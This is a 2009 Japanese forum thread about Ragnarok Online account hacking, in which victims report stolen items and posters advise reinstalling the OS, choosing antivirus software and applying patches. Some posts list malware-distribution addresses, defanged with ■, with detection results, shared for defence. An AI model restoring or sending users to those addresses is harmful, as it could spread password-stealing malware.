他の案件が入っていた場合は順番に処理されていくので遅くなる。
まあ、大体の目安は>>2にある体験談のような感じに進んでいくのでそれを目安にすればいいかと。 <> (○口○*)さん<>sage<>09/06/17 23:30 ID:mw1ocNTt0<> >>128
RO関係の対応は暫く時間を要するだろうから、当座で必要なことをまず考えた方が良いかと。
家族と共用という事から、現状のままそのPCを使い続けることは更なる二次的被害を引き起こすリスクがある。
恐らくは、最近の主流であるAdobe Readerの脆弱性を狙われたのだと思われるが、安全性を留保するには
OSも含めてクリーンな状態にした方が確実。>>6-7を参考にしつつどうぞ。
入れ直しの完了後は、最低限Flash PlayerとAdobe Readerは確実に最新の物へアップデートを行っておく必要が有る。
必要なのであればRealPlayerやQuickTime(iTunes)も含めて。

それと、セキュリティがゼロなソフトも乗り換えを検討した方が無難だろうね。 <> (○口○*)さん<>sage<>09/06/18 07:55 ID:N5pFUZGq0<> >>123
ご愁傷様です・・・
復旧に関しては私の場合半年かかりました。
被害アカウントやキャラが多いとかなり時間かかると思います。

ガンホーの調査に関しては待つ必要はありません。
最寄の警察に相談してくださいの一点張りです。
警察からガンホーへ調査依頼が行かないと何も進展しません。
少しでも早く復旧してもらいたいのでしたら、
まずは警察に届ける方がいいと思います。

全キャラのパスが変更されていたとありますが、
元のパスはキャラ共通でしたか?
キャラ毎のパス変えても簡単に総取りされてしまうんでしょうかねぇ・・・ <> 123<>sage<>09/06/18 12:31 ID:WLhQpYnW0<> >>134
今朝思い直して昼休みに警察に電話していました。
あっちこっちたらいまわしされて。最後は担当者がおりませんといわれました・・・
所轄の担当の係はわかったので、夕方にでも時間を改めて電話したいと思います。

元のキャラパスについては垢ごとは違ったのですが、同一垢はすべて同じでした。
2垢目はウィルスが入ったあと1キャラしか動かしてなかったのですが、
錐受け取り待ちのアサ以外は抜かれてました・・
被害は2垢9キャラです。
総取りどころか全キャラのzはもちろん倉庫の収集品まですべてなくなってました・・・

最後に再び2点質問なのですが、できればOS入れ直したほうがいいとは思うのですが、
PCショップで買ったPCでして、入れなおすのはだいぶ難しいそうです・・・

一応上記のウィルスセキュリティゼロでウィルスが出てから2種オンラインスキャンをしてみたのですが、
今のところ新しいウィルスはでてこないのですが
これで安全確保できたとはいえないでしょうか・・?

ちなみに試したのはトレンドフレックスセキュリティ と@niftyウイルスチェックサービス
の2種です。

2点目はセキュリティーソフトの新調を考えているのですが、
多少高くてもいいのでオススメのソフトはありませんか? <> (○口○*)さん<>sage<>09/06/18 14:24 ID:fzRdjKWG0<> >135の質問部分に
 OS入れなおしについてショップPCだから、というのはあまり問題にはならない。
とりあえず「リカバリーディスク」もしくはプログラムにそんな項目がないか探して見るんだ。
 ウィルス駆除→セキュリティチェックを行った→でない→これで安全か? の問いは
以前からスレで何度も言われているように安全ではない。
アカハックアドレスを踏んだ際にそのセキュソフトで駆除できない(パターンを持っていない)
未知のウィルスが紛れ込んでいる可能性が否定できないため。

 以上2点により、メーカーPCであってもOS再インストールを強く薦める。
OS再インストールしないで使用した場合は今後どうなっても自己責任としか言いようがない。

セキュソフトは個人的にはカスペがいいけど、どっちにしても
(ヘンなアドレス踏んで)セキュソフトが反応した時点で、自分はもうOS再インストールコースにしてる。
駆除ソフトとしてじゃなくて、アラートとして利用してる感じかな。
逆にどんなアドレスでもかってに注意するように思考がインプットされてきた。 <> (○口○*)さん<>sage<>09/06/18 15:01 ID:Vr5CNY3w0<> OSの入れなおしでPCのスキルアップができると思えば、安い手間じゃねーか。がんばれ。

ぶっちゃけ、他に出てこなくても、いつ踏んだかわからないようなPCでは恐くて安心できん。
落とした奴がWindowsにどんな変更加えたかわからないし。

OS入れなおしには、SP+メーカーが便利です。
http://wikiwiki.jp/faqwinsppm/?SP%2B%A5%E1%A1%BC%A5%AB%A1%BC%20FAQ%2F2.%A4%E8%A4%AF%A4%A2%A4%EB%BC%C1%CC%E4%2F02.SP%2B%A5%E1%A1%BC%A5%AB%A1%BC%A4%CE%BB%C8%A4%A4%CA%FD
http://freesoft.tvbok.com/freesoft/pc_system/windows_recovery.html

OSインストール方法の解説(最初に見つかったのを張っただけで、もっとわかりやすいとこもあるかもしれない)
http://mbsupport.dip.jp/instwindowsx.htm



このスレ的なお勧めは、検出率に偏っているので、カスペかAntiVirになると思います。
AntiVirは別途PFWを用意する必要があるので、カスペの方がいいかもしれません。
PCスペック的に余裕があれば、GDATAもありかも。

各種セキュリティソフトは、試用ができると思いますので、発売元のHPへどうぞ。 <> (○口○*)さん<>sage<>09/06/18 15:36 ID:VgeQO9uy0<> >>135
たらい回しにされた件は、きっちり県警本部にクレームとして入れておいた方がいい。
連絡体制の不備なのだろうけど、体質的な問題は外部からの指摘が無いと中々改善されないから。

OSの再インストールに関しては、自分で経験してみないと身につかない部類の事ではあるけど、物理的・論理的
クラッシュなど何時かは必要になることも往々にしてあり得る。
ショップPCと言うのがいわゆるBTOモデルだと仮定して、大抵は再インストール用の媒体か、OS自体の媒体と
ドライバディスクなどが付属している。
作業上の不安があるなら、PCの型番やモデル名、あるいは具体的な該当ショップのwebサイト等を示したり、
RO板の環境スレにあるようなPC環境取得ツールなどで現状のスペックを晒すことで、必要なドライバ類などの
アドバイスを受けやすくすることも可能ではある。

それにも抵抗があると言うのであれば、実際の購入ショップに持ち込み、再インストールを依頼する手段もある。
この場合、作業費用などの実費が発生することになるとは思われるが。

あとは、今後の転ばぬ先の杖的な対策として、PC環境丸ごとのバックアップソフト導入もお薦め。
個人設定や常用するアプリケーションなどを導入した状態を保存しておくことで、トラブル発生時に最小限の手間で
正常に使える状態まで復元が出来るようになる。 <> (○口○*)さん<>sage<>09/06/18 18:27 ID:uerU2Pcq0<> 今はアンチウイルスを何にするか、よりも、
OSやアプリケーションの脆弱性や修正の情報にしっかり耳を傾ける
ことの方が重要だ。

ゼロデイ攻撃も確かにあるが、それよりも遙かに多いのは、
既知の、しかも修正版が出ているタイプの脆弱性を狙うものだから。 <> 123<>sage<>09/06/18 19:50 ID:EtWPz5Qq0<> 今帰ってきました。
出さきで携帯から所轄の担当の方に対応していただいたのですが、
親切でMMOもよく知っていらっしゃる方でよかったです・・・
明日の午前中にお話をしにその方のところに行ってきます。

>>137
以前、メーカー製のPCなら自分でリカバリーしていたのですが、
PCショップで買ったのは数枚のディスクを使ってやるそうで
5枚ほどあるのですが、確かこのうち3枚を使うと言ってたような・・・
しかも、説明を聞きながらきょとんとしてるとショップの方がいれなおすときは持って来てくださいと言い直したので、
全く分りません・・・
なのでおとなしく、お店に持っていこうと思います。

>>138
ご丁寧にありがとうございます。
前のPCではリカバリーディスク1枚でできたのですが、
ショップで買ったとき多分・・3枚ディスクをもらって
これ全部でリカバリーしないとできませんのでするときは持って来てください
といわれてます・・・
しかも買った時に5枚ディスクを貰っていて
素人目では全くどれからやっていいか分りません・・・
なので来週時間を作って、PCショップでリカバリーしてもらいに行ってきます。

>>139
PCについて無知なのでピンと来ないのですが、
購入時からまったくいじってないアプリケーションもあるのでこれを気に勉強します・・ <> (○口○*)さん<>sage<>09/06/18 20:00 ID:Vr5CNY3w0<> >>140
1枚はOS。基本的に入れるのはこれ。Windows〜と書いてあります。
ホログラムっぽいディスク表面ですので判りやすいと思います。
プロダクトIDのシールがビニールに貼ってあったら、それは絶対に捨てないように。
捨ててしまうと再インストールできなくなります。

2枚目はドライバーディスク。OS入れた後、認識しないデバイスを認識させるのに使う。
M/B付属のものがそのままついている場合と、ショップで用意したものの場合がある。
(インターネットから最新のドライバーを落として別途用意しておけばいらない)

3枚目はアプリケーションディスク。DVD視聴とか、CD-RやDVD-R書込みのソフトはそれを使って入れる。
一度も使ったことのないソフトなんかは入れる必要がないので、必要なものだけ選択していれればOK。
このディスクはそのソフトを使いたくなるまで放置していい。

あとの2枚は知らない。

>なのでおとなしく、お店に持っていこうと思います。

試行錯誤して、ぼくにもできたーヽ(´∀`* )ノ となって欲しいもんです。
お店の人なむ〜。

お店に持っていけばやってくれますが、どう考えても有償になります。そのことを理解した上で持っていくようにね。 <> 123<>sage<>09/06/18 20:48 ID:EtWPz5Qq0<> >>141
1〜3枚目は分りました。
残りの2枚のうち1枚はモニターの奴だったみたいで
あと1枚はMotherboard Auto Installationと書いてあります・・。

車がないのでできれば自分でやりたいです。

頑張ってみます・・ <> (○口○*)さん<>sage<>09/06/18 23:29 ID:fzRdjKWG0<>  んーと、最初にそのホログラムのやつを入れてOSを入れて最後まで完了させる。
次にその最後にでたMotherboardうんちゃら、ってのを入れて、マザーボードをまず認識させないとダメ。ここまでは必須。

その後は、あまり知識なさそうなのでドライバディスクも入れたほうがいい……気もする。
モニタのディスクはよく分からないが、多分必要はない気もする……。が
例えば画面の解像度がちっさくなったとか、なんか不都合あったらここでもっかい聞いてみるといい。
アプリケーションディスクはまぁいらないんじゃないかな。NEROぐらいは入れておくと便利だけども <> (○口○*)さん<>sage<>09/06/19 04:01 ID:52bx/WpV0<> PCのセットアップとかはさすがに板違いだろ <> (○口○*)さん<>sage<>09/06/19 10:14 ID:kNMsQWCS0<> 派生話題じゃなかったら叩き出されてるが、どこのスレがいいって、ないんだよね。
RO環境スレでも、再インストール方法の相談までは扱ってないし。

DSP版OSでの再インストールに関する一般的な方法は出たんだし、あと付け加えることないだろ。
収束した話題に突っ込むのはどうかと思うぜ。

なんとなく気になるので、無事に再インストールできましたって報告が来るのを待ってたりはするが。 <> (○口○*)さん<>sage<>09/06/19 21:19 ID:kNMsQWCS0<> MS、無料ウイルス対策ソフトを23日公開
http://www.afpbb.com/article/environment-science-it/it/2613105/4282627

OnCareも得手不得手の激しいソフトだったし、MS製無料セキュリティソフトは、どんなのが出てくるのかなぁ。
乗り換える気はないが、ちょっと楽しみだ。 <> 123<>sage<>09/06/19 22:56 ID:ShURoV/s0<> やっともどってこれましたー
なんとか自力で5h近くかけてやりとげました。

>>144
申し訳ないです、だいぶパニくってたので
スレ違いなんてまったく頭になかったです。

気になってる方はいないかもなのですが、警察にも午前中行ってきました。
思ったよりすごく丁寧に話を聞いていただいて、捜査もしていただけるようです。
捜査はどんなに最短でも1ヶ月、長ければ1年ほどとのことです。


スレ違いなとこまでお世話していただいて本当にありがとうございましたー

できることはしたので後は気長に待ってみます。 <> (○口○*)さん<>sage<>09/06/20 20:14 ID:QJvKviz40<> リネージュ資料室の更新リストに新しく載ってたもの

この2つは同じもの
p://www■hotgome■net/
p://www■okireng■com/

最終的に呼び出される本体
p://www■livedoorm■com/Test■exe

VirusTotal 本体のみ(29/41) SymantecとK7を除いた国内の有名所は殆ど検知してる模様。
ttp://www.virustotal.com/analisis/eddf92d30c8abd0f663a376f13a882dd854c03e367174a5f3589a4edf8e8196c-1245495840 <> (○口○*)さん<><>09/06/21 11:36 ID:puT5wjGW0<> >>146
SS見る限りForefront Client SecurityのUI変えただけに見えるが
マイクロソフトは意外とオンラインゲームハック系の対応早いから
ゲームやってる人にはいいんじゃないかな? <> (○口○*)さん<>sage<>09/06/21 17:51 ID:nZgQvdbQ0<> >>146
数種類ある更新料無料の(なんちゃら)ZEROっていうよりかは
期待できそう <> (○口○*)さん<>sage<>09/06/23 00:51 ID:ELMvcbzu0<> mixiに貼られていたもの

上はma.exeが落ちてくる。殆どのベンダーが撃墜。

下のwmvは新型の可能性あり。現時点ではVirusTotalで(0/40)なので、動作しないものかもしれない。
ドメインがアカハック業者のものであることと、468KBというサイズがなんとなく引っ掛かるので、
カスペ辺りに提出して判断を仰いで見た方がいいのかな。

p://www■snsatfb■com/video/videodown■php?7d1204c15abb68a3489c46287a3df82bb59ce665&submit=search&ap=1
p://www■atwikisjp■com/video/0616ro■wmv

404 not Found(既に検体入手できなかった orz)
p://uproda■2ch-library■com/139622KJ2/lib139622■wmv <> (○口○*)さん<>sage<>09/06/23 01:05 ID:vi0JjN3I0<> wmvはただの動画だったよ。
まぁそれっぽいファイルも置いて罠を踏みやすくしてるんでしょう。 <> (○口○*)さん<>sage<>09/06/23 01:18 ID:7fS9fzwoO<> なにやらノートンに
トラッキング クッキーってのが、
引っ掛かってたんだけど、
どなたか詳しい解説頼めます?

ちらっとノートンの説明読んだだけじゃわかりづらくて <> (○口○*)さん<>sage<>09/06/23 01:19 ID:ELMvcbzu0<> いや、そのまま「トラッキングクッキー」でぐぐれば・・・・・・・・・

やさしいセキュリティ(トラッキングCookie)
ttp://eazyfox.homelinux.org/Security/Beginner/beginner08.html <> (○口○*)さん<>sage<>09/06/23 01:27 ID:7fS9fzwoO<> ありり
取り敢えずあまり問題無さそうだってのは、
把握できました <> (○口○*)さん<>sage<>09/06/23 02:21 ID:ELMvcbzu0<> >>152
確かに、カスペでもF-SecureのSampleAnalyzeSystemでも、白判定でした。 <> (○口○*)さん<>sage<>09/06/23 03:49 ID:0IIF51QD0<> >>151
撃墜って分かりにくい表現ですね
すり抜けとか書いて欲しい <> (○口○*)さん<>sage<>09/06/23 14:38 ID:vi0JjN3I0<> どんなゆとりだよ <> (○口○*)さん<>sage<>09/06/23 19:32 ID:rAOAyEwJ0<> その昔、Norton先生の前身になったソフトがSAMと言ってだな…… <> (○口○*)さん<>sage<>09/06/23 21:26 ID:Rewy6/CV0<> けど見たとき一瞬「ん?」って思うよね <> (○口○*)さん<>sage<>09/06/23 23:23 ID:5BZDlcxO0<> 思わない <> (○口○*)さん<>sage<>09/06/24 01:37 ID:umUCd+R00<> 俺は撃沈と読み間違えてしまった

>>157
撃墜だと「撃ち落とした」って事だから「検出できた」じゃないか? <> (○口○*)さん<>sage<>09/06/24 01:42 ID:/atFDdwu0<> 迎撃成功?

余所で通じるかはともかく、このスレ内では、撃墜で通用すると思う。検知と書いた方がいいかもしれんが。 <> (○口○*)さん<>sage<>09/06/24 14:02 ID:/+3DTtlP0<> 戦争ごっこ大好きな子供じゃあるまいし普通に検知でいいよ・・・ <> (○口○*)さん<>sage<>09/06/25 10:42 ID:XdBJSO+O0<> phpMyAdminのエクスプロイトが出現、パッチ適用の確認を
http://www.itmedia.co.jp/news/articles/0906/25/news030.html

ファンサイト・Wikiもレンタル鯖をつかってるから怖い怖い。
いつもよりも注意した方が良さそうだ。 <> (○口○*)さん<>sage<>09/06/25 18:16 ID:3FFV3G5T0<> ログインの公式サイトアクセス以外は仮想PC使えばいいんでね? <> (○口○*)さん<>sage<>09/06/25 19:26 ID:e2s/G9ut0<> 動作が重いのでavast!でウィルススキャンしたら
ウィルス3スパイウェア1トロイ2を発見
削除を試みたらウィルス3は削除、スパイウェアは検査不能、トロイ2は削除中にエラー
該当するフォルダが見つからなかったので検査結果を閉じました
C\Systemってどこやねん……
これは駆除できたと見てよいのかな?
彼是、二週間あまり前からコイツらに感染してた見ただから
垢ハックとは関係のないウィルスだけど
創作系のサイト・板に投稿してる身としては木馬でぶっこ抜きされると
書き溜めを盗作される危険性ががが <> (○口○*)さん<>sage<>09/06/25 19:28 ID:6s9Qh04H0<> と言われましても… <> (○口○*)さん<>sage<>09/06/25 20:24 ID:K0VFBX2G0<> >>167
おとなしく、PCリカバリ(またはOS再インストール)してこい。どこで聞いても、それ以上の回答は出てこないよ。 <> (○口○*)さん<>sage<>09/06/25 21:38 ID:MFXjBm6P0<> >>167
System Volume Information
システムの復元機能がデータを保存しておくフォルダ <> (○口○*)さん<>sage<>09/06/25 22:31 ID:K0VFBX2G0<> 「Kaspersky Internet Security 2010」欧州で発売
ttp://internet.watch.impress.co.jp/docs/news/20090625_296612.html
>日本国内の発売日は未定だが、Kaspersky製品を販売するジャストシステムによれば、
>「例年通りであれば秋口に発売する」としている。 <> (○口○*)さん<>sage<>09/06/25 22:40 ID:XdBJSO+O0<> >>167
隠しフォルダを見えるようにして、アクセス権をEveryoneフルコントロールにでも設定すれば多分おk

今まで意図的に踏んだ以外で感染したことないんだが、結構あるんだな…… <> (○口○*)さん<>sage<>09/06/25 23:07 ID:VLXNcZx60<> >>167
システムのプロパティ - システムの復元タブ - 利用可能なドライブ - C:を選択して設定ボタン - スライダーを左めいっぱいにしてOK。
これで該当フォルダの中身がクリアされる。終わった後はスライダーを元の位置に戻して再度OK。
面倒なら、すべてのドライブで〜にチェックを入れてOK→再度プロパティを開いて外しても良い。
システムの復元機能にお世話になることはそれほど多くなく、最終的にはOS入れ直し(リカバリ)に頼った方が確実なのだし。 <> (○口○*)さん<><>09/06/25 23:14 ID:OJ9XClWL0<> 質問スレッド256からきたのですが皆さんウィルスバスターは何使ってますか?

トレンドマイクロの2009使ってますが変えるつもりでして知ってるのはノートンくらいしかないのですが
相性もあるみたいで参考に聞いてみようと思うのですが。 カスペは最新版がだめっぽいのでカスペ以外で何かありますでしょうか? <> (○口○*)さん<>sage<>09/06/25 23:54 ID:e2s/G9ut0<> >>173
マイコンのシステムっすね
了解〜 <> (○口○*)さん<>sage<>09/06/26 00:01 ID:anrwPxri0<> >>174
>ウィルスバスターは何使ってますか?

ウイルスバスターは使っておりませんが。 <> (○口○*)さん<><>09/06/26 00:22 ID:5sRVM+AU0<> 使ってないんだw ノーガードだと色々心配なんですよね <> (○口○*)さん<>sage<>09/06/26 00:32 ID:anrwPxri0<> >カスペは最新版がだめっぽい
根拠が分からん

ま、個人的なことで言えば興味があるのはESETだが
今はカスペのサブセット版みたいなモノを使っている <> (○口○*)さん<>sage<>09/06/26 00:49 ID:YugJap+x0<> ただのキチガイだろ
放置しろ <> (○口○*)さん<><>09/06/26 01:10 ID:5sRVM+AU0<> なるほどー 助かります いろいろ試さないとダメポかぁ <> (○口○*)さん<>sage<>09/06/26 01:10 ID:sTaMPbif0<> カスペ盲目信者キモイ

まぁ俺もカスペ使ってるけど <> (○口○*)さん<>sage<>09/06/26 01:11 ID:iAINUnZN0<> 質問スレのほうも見てきたけど、商品名(ウイルスバスター)と総称(アンチウイルスソフト等)を区別してないだけに思われる。
そう邪険にかかるのもよくないぜw <> (○口○*)さん<><>09/06/26 01:27 ID:aH5yjTBqO<> カスペの最新版は強力すぎてちゃんと設定してから使うといいです。従来の設定のままだとRoをプレイするとキーロガーと見なされ画面中央にこれはキーロガーだよ!終了できなかったよ!と毎回のようにでてくることでしょう、Nプロテクトも遮蔽を試みる悪質プログラムです!隔離処理しますよ!と設定してもしなくとも出てきます。こごでキーロガーとデバイス遮蔽チェックを外すことで回避できます本末転倒です。

信用アプリに指定しても抵抗は無意味だ!怪しいやつは隔離と強制処理すると宣うカスペ <> (○口○*)さん<>sage<>09/06/26 01:31 ID:bzPE9ny30<> なんだかいかにもロシアらしいな <> 183<><>09/06/26 01:33 ID:aH5yjTBqO<> でもね、いくら
設定してもこれはキーロガーだ怪しいやつめとカスペにIMEのF5のように邪魔してくるんですよ!まぢ助けて!てか本当にキーロガー仕込まれてたら怖いんだけど!マジレス求む

ちなみにウィルスバスターからの乗り換え組です! <> (○口○*)さん<>sage<>09/06/26 01:36 ID:+en7iFMi0<> >>180
>いろいろ試さないと

私も二年前にやったけど、
今は試用版の有るウィルス対策ソフトがあるから、
とっかえひっかえ、片っ端から入れて使ってみるのが一番良い。
RO や自分で使う他のソフトとの相性問題も一発で分かるし。

やってみたらレポートよろしく。
2年前とは各ソフトの状況が変わってるだろうから、
私が試した当時の資料は役に立たないだろうし。 <> (○口○*)さん<>sage<>09/06/26 01:37 ID:AKEoqm4e0<> ROのクライアントの仕様です <> (○口○*)さん<>SAge<>09/06/26 01:38 ID:aH5yjTBqO<> 今さらだがさげ!

サブセッとって
アンチなんとか? <> (○口○*)さん<>sage<>09/06/26 01:45 ID:anrwPxri0<> >>188
つ ttp://www.nifty.com/sec24/ <> (○口○*)さん<>sage<>09/06/26 03:38 ID:7cmqQV9X0<> >>185
パッチでROのexeファイルが変わったり、nProが動作しているのに検知しないような
セキュリティソフトの方がおかしいです。nProを検知するのがまともな奴だから気にするな。

相談するときは、検出したセキュリティソフト名、検出したファイル名、検出された名称を
全て省略することなく書かないと、許可していい奴かどうか誰にもわかりません。
相手はエスパーじゃないんだ。必要最低限の情報も出さずに相談するんじゃない。 <> (○口○*)さん<>sage<>09/06/26 06:15 ID:efjxDo5O0<> >>173
直りました
レスポンスが向上(笑)してますw
avast!のアンチウィルスも寝ている間に起動していたのですが
何も検知しませんでした♪

これで動きがカクカクしないぞー <> (○口○*)さん<>sage<>09/06/27 12:18 ID:DWZ+p1j80<> DirectShowの脆弱性
ttp://www.microsoft.com/japan/technet/security/advisory/971778.mspx
を悪用したネトゲのパス抜きが出回り始めています。
ttp://blogs.technet.com/mmpc/archive/2009/06/25/online-game-password-stealers-riding-with-0day-directshow-exploits.aspx

WindowsUpdate等でのパッチの提供は行われていません。
暫定的に以下の「Fixit」を実行しておきましょう。
ttp://support.microsoft.com/kb/971778/ <> (○口○*)さん<>sage<>09/06/27 12:44 ID:ciUYh3hN0<> >DirectShowの脆弱性
前にこのスレで話振ったのに、なんかスルーされたんだよな <> (○口○*)さん<>sage<>09/06/27 12:47 ID:ytyJQuNB0<> QTファイルをクリックすることがねーからなー <> (○口○*)さん<>sage<>09/06/27 13:19 ID:vkB2WYt60<> mixiに貼られていたもの。
play.exeが落ちてくる筈なんだが、うちからは何度やっても0KBのファイルになる。

p://lowercase2009■425mb■com/download■php <> (○口○*)さん <>sage<>09/06/27 20:06 ID:csU6Jcea0<> スレ違いでしたら申し訳有りません。
最近、ラグナロクをプレイしてるときにおかしな現象が多々あるので、垢ハックではないのかと心配しております。
ご意見をいただけましたら幸いです。

最初にラグナロクにログインしてゲーム起動をクリックしますとパッチクライアントが起動しますが、そのとき画面が切り替わる際に■■の様な記号が一瞬出てから通常画面に切り替わる

キャラクター選択してマップが表示された後10秒ほど動けない(一度ログインしたあとはccしても普通に動けます)

ややこしいHPはあまり見ないように気をつけてますが、間違えて踏んだ可能性もあります。
同じような症状の方おられますでしょうか? <> (○口○*)さん<>sage<>09/06/27 20:19 ID:vkB2WYt60<> マイケル・ジャクソンの死去を題材にしたスパムが早くも出回る
ttp://internet.watch.impress.co.jp/docs/news/20090626_297100.html

うちにもきたーと思ったら、中身は、アダルト系サイトのspamに無理矢理とってつけてただけでした。orz <> (○口○*)さん<>sage<>09/06/27 20:25 ID:vkB2WYt60<> >>196
エラースレの相談時のテンプレからPCスペックとRO環境書いた方がいいかも。
最低限確認したいのは、フルスクリーンでの起動か、Windowモードかというのと、メモリをどの程度積んでるかかな。

Windowモードでは■■というのが出てこないのでそこんとこはわかんないです。
SSは無理にしても、携帯のカメラとかで、出ているところを撮影して、アップローダーにでも上げてもらえると
他の方が判断しやすいと思います。

>キャラクター選択してマップが表示された後10秒ほど動けない(一度ログインしたあとはccしても普通に動けます)
PCスペックの問題の可能性があります。メモリが少ないと発生しやすいです。
この辺は、PCスペックがわからないのでなんとも言えません。


不安な場合の対処法:複数のセキュリティソフト(オンラインスキャナを使用)でチェックをかける。
それでも不安な場合:`PCリカバリ または OS再インストールをしてからパスワードを変更する。 <> (○口○*)さん<>sage<>09/06/27 20:40 ID:fxGDZc/E0<> >>196
いつからかわからないけどうちのPCでもなってるよ。
告知画面に切り替わる前に、「表示されない場合はここをクリック」みたいな文字が表示されるんだけど、
それが文字化けしてる。
特に気にしてなかったので原因も対策法もわからなくてごめん <> (○口○*)さん<>sage<>09/06/27 21:23 ID:vkB2WYt60<> ああ、あの文字化けか。■じゃないし、似てないしと思った。

パッチクライアント画面の文字化け(Ctrl+F5でも直らず、そこをクリックすれば出てくる)なら、うちでもなってますよ。
あそこが化けたり表示されなかったり表示崩れたりするのはいつものことなんで気にしない。 <> (○口○*)さん<>sage<>09/06/28 14:25 ID:mjEfB67b0<> にゅ缶とかの話みてるとサンク共闘が全鯖での普通だろ?
どんだけ田舎者なんだここの住人は <> (○口○*)さん<>sage<>09/06/28 17:09 ID:uHua7uwY0<> >あの文字化け
ヘッダで uth-8 を指定しているのに、中身は Shift_JIS というオチ。 <> (○口○*)さん<>sage<>09/06/29 04:01 ID:gcZLSNev0<> >>202
RO公式HPはその手のミスが結構あるよね。
サイト内検索とかEUCとSJISが混在してたり <> (○口○*)さん<>sage<>09/06/30 03:10 ID:mUPmV7fd0<> 「Firefox 3.5」正式版は日本時間7月1日公開予定
ttp://internet.watch.impress.co.jp/docs/news/20090629_298422.html <> (○口○*)さん<>sage<>09/06/30 18:21 ID:YTRf1xNw0<> RC2試してみた感じでは、アドオンが完璧動作しなかったりだったので
少し待ちだなあ。JavaScriptは間違いなく高速化されているけれど、
ChromeやSafariにはかなわないし。 <> (○口○*)さん<>sage<>09/06/30 20:09 ID:eb4t6R7m0<> 鯖板を見ていたら急に画面がまっしろになって(どこもクリックしていない)
アドレスバーには見慣れないURLが表示されていました。
おかしいと思いそのURLを元に調べてみたら、残念なことにどうやら垢ハックサイトのようです。
その時動いていたのは、メッセンジャーと当該ブラウザ(Opera)とウイルスバスター2009。
とりあえずウイルスバスターで検索してみるも検知はCookieのみ。
今、オンラインスキャンしてるところです。
起きてしまったことは仕方ないですが、開いていた掲示板には該当するURLなど貼ってありませんし、
その経緯が腑に落ちません。考えられる原因って、いったい何かしら・・・ <> (○口○*)さん<>sage<>09/06/30 20:28 ID:k7g2bLKs0<> >>4
・アカハックアドレスはMMOBBSでは禁止単語になっています。
 加えて、誤クリックによる感染を防ぐ為にそのようなアドレスは
 .(ドット)を別の文字に置き換えて報告して下さい (■がよく使われています) <> (○口○*)さん<>sage<>09/06/30 20:37 ID:MgINmyrQ0<> >>■■
某影の薄いヒロイン様かと思ったぜ…… <> (○口○*)さん<>sage<>09/06/30 20:38 ID:k7g2bLKs0<>       ,一-、
     / ̄ l |
    ■■-っ
    ´∀`/
   __/|Y/\.
 Ё|__ | /  |
     | У..  | <> (○口○*)さん<>sage<>09/06/30 21:11 ID:mUPmV7fd0<> >>206
別のどこかをクリックしたつもりで、iframeとか転送アドレスなどで誘導されることはよくあります。
取り敢えず、PCリカバリコースいってらっしゃーい。

あと、ドットを■に置きかえて、踏んでしまったと思われるアドレスを、ここに貼っていって貰えると助かります。 <> (○口○*)さん<>sage<>09/06/30 21:47 ID:eb4t6R7m0<> アドレスは>>38で既に出てるけど、
ttp://sakura■sitesled■com/?gclid=CKPE_MfRsZsCFQEupAodJzWEQA
「ROアカハック対策スレのhostsファイルまとめ臨時」のリストにも挙がっていました。

別のどこかと言っても、どこかをクリック自体した覚えがないのがやるせない。
後で時間のある時にでもリカバリしてみます。レスthxでした。 <> (○口○*)さん<>sage<>09/06/30 22:31 ID:mS5dxuP60<> スキャンしても怖いのでOS再インストを考えてるHDDがあるのですが、
パーツ屋で新しいHDD買ってきて新OSを入れて、上に書いたHDDはローカルディスク(E:)なり何なりにして
SATA別接続の記憶媒体で使おうと思うのですが、新HDDでROをやる場合、もし(E:)にウイルスが残っていた場合でも、
それをクリックしなければ新HDDに感染はしませんか?
それができるなら、EからCに安全なデータを退避しつつ最終的にEをフォーマットということができるのだが…
どなたかご教授おねがいします。 <> (○口○*)さん<>sage<>09/06/30 22:49 ID:mUPmV7fd0<> >>212
>それをクリックしなければ新HDDに感染はしませんか?
>EからCに安全なデータを退避しつつ最終的にEをフォーマットということができるのだが…

Yes。実行しなければ発動しません。予定している方法でOKでしょう。 <> (○口○*)さん<>sage<>09/06/30 22:57 ID:mUPmV7fd0<> >>211
報告ありがとうございます。

危険かどうかチェックしようとしたのですが…ソケットエラーで繋がりませんでした。 <> (○口○*)さん<><>09/07/01 16:50 ID:4MsCbGjY0<> PCに詳しくないので読んでても理解不能な事が多く・・・orz
分かる人いたら教えてください。
今日某サイトで添付ファイルをクリックしたところ、ZIPのファイルでした。
DLはしていないと思ったのですが、マイピクチャに見慣れないZIP形式のファイルが・・・
即座に削除し、ガンホーIDパスワードの変更も行ったのですが、入力をミスしたらしく、ログインできない状況に・・・
再登録を行おうとしたら、メルアド変更していたのに登録し忘れていたことに気が付きorz
問い合わせしてるけど返事がまだ来ず、ログインもできないので垢ハックされていないか不安に陥っている状態です。
余計な話が長くなってしまいましたが、つまりはZIPを開いていなくても感染するのかどうかということなのですが・・・
ウィルス検査も問題はなく、感染したかどうかというのはどうすれば分かるものでしょうか?
初めてこういう書き込みをするので、内容がわかりずらかったらすみませんorz <> (○口○*)さん<>sage<>09/07/01 16:53 ID:rfqidwYx0<> エスパー募集中 <> (○口○*)さん<>sage<>09/07/01 17:04 ID:XXMoEg+x0<> >今日某サイトで添付ファイルをクリックしたところ、ZIPのファイルでした。

はい、それをドットを■に置き換えて晒してね。

取り敢えず、実行しなければ発動しません。ただ、貴方の場合、発動させてるかどうかすらわかってないでしょう。
安全であるとの保証はできませんので、PCのリカバリを検討してください。

また、仮に踏んで発動させても、それ以降にパスワードを入力する場面がなければ、アカウントハックはされません。
発動させてたら、パスワード変更した時点で盗まれているので、意味無いです。

パスワード変更はクリーンな環境から。これは鉄則です。踏んだと思ったら、パスワード変更の前にクリーンな環境の
構築。もしくは、パスワードを盗まれてもPG2によって盗まれたデータの送信をブロックするように設定してから
パスワード変更してください。 <> (○口○*)さん<>sage<>09/07/01 17:06 ID:6NYTeFpp0<> >>215
BBSかなんかの添付ファイルが(拡張子)zipで、つもりはないけどDLしていたってことかな?

DL⇒解凍⇒なんらかのexeを実行のプロセスを踏んでいないみたいだから大丈夫だと思うけど。
疑心暗鬼になるならOSから入れなおすしかないと思うよ。

※windowsってzipを解凍しなくても中身のファイル実行できる機能(選択した時点で%temp%に解凍している?)
があるからあなたがzipを開いた操作をしていないつもりでも実は・・・があるのかもしれないけど。 <> (○口○*)さん<><>09/07/01 17:35 ID:4MsCbGjY0<> 丁寧なご返答ありがとうございました。
解凍はしていない状態での削除でしたので、大丈夫でしょうかね・・・
でもパスワード変更の後に、ファイルの存在に気がついたので危険かな・・・
とりあえずガンホーIDが取得できなければクリーンな環境での変更もできないので、ガンホーからのメールを待ってみます。
